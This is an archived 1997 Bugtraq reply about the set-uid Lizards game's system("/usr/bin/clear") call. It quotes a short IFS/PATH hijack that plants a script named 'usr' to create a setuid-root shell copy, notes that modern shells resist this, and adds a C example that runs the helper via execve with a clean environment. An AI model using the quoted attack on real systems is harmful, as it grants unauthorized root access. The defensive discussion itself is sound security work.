Bugtraq mailing list archives
Re: Vunerability in Lizards game
From: hzoli () FRONTIERNET NET (Zoltan Hidvegi)
Date: Tue, 18 Nov 1997 21:14:49 -0600
Joe Zbiciak wrote:
> John Dow said previously:
> | - but then again, my system("clear") wasn't particularly
> | elegant either. How about system("/usr/bin/clear")?
>
> That won't work. An attack along these lines will slice through that
> "fix" pretty quickly, if I'm not mistaken.
>
>     export IFS=/
>     export PATH=.:$PATH
>     echo "cp /bin/sh ./root_sh; chmod 4755 ./root_sh" > ./usr
>     chmod 755 ./usr
>     lizards
Actually recent POSIX shells are immune to this kind of attack, since IFS is only used to split the result of parameter expansion. No shell under Linux has this behaviour. This system() call seems to be secure, but it is still bad practice. Recent shells disable .bashrc, $ENV etc. processing when euid != uid or egid != gid and functions are not imported (see the privileged option in the bash manual).
> "system()" is just not cut out for security.

Definitely. And its performance is also quite bad. It's a waste of resources to fork/exec a large shell just to execute a tiny program.

Zoltan
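Added example, not part of the original post or of the Lizards source: one way a set-uid program can run a fixed helper such as /usr/bin/clear without system(), so that no shell ever parses IFS, PATH or $ENV supplied by the caller. The function name run_without_shell, the contents of clean_env and the decision to drop privileges in the child are assumptions made for this sketch.

```c
#include <errno.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment for the child. Nothing is inherited from the invoking
 * user, so a hostile IFS, PATH, ENV or LD_* never reaches the helper. */
static char *const clean_env[] = {
    "PATH=/usr/bin:/bin",
    "IFS= \t\n",
    "TERM=vt100", /* constructed value; a real program would validate the user's TERM */
    NULL
};

/* Execute argv[0] directly (no shell). argv[0] must be an absolute path.
 * Returns the child's exit status, or -1 on error or abnormal termination. */
int run_without_shell(char *const argv[])
{
    if (argv == NULL || argv[0] == NULL || argv[0][0] != '/') {
        errno = EINVAL;          /* refuse anything that needs a PATH search */
        return -1;
    }
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Child: give up set-gid, then set-uid, before running the helper
         * (assumption: the helper needs no elevated privileges). */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);
        execve(argv[0], argv, clean_env);
        _exit(127);              /* exec itself failed */
    }
    int status;
    while (waitpid(pid, &status, 0) < 0) {
        if (errno != EINTR)
            return -1;
    }
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char *const argv[] = { "/usr/bin/clear", NULL };
    return run_without_shell(argv) == 0 ? 0 : 1;
}
```

This also avoids the cost of starting a shell just to launch one small program.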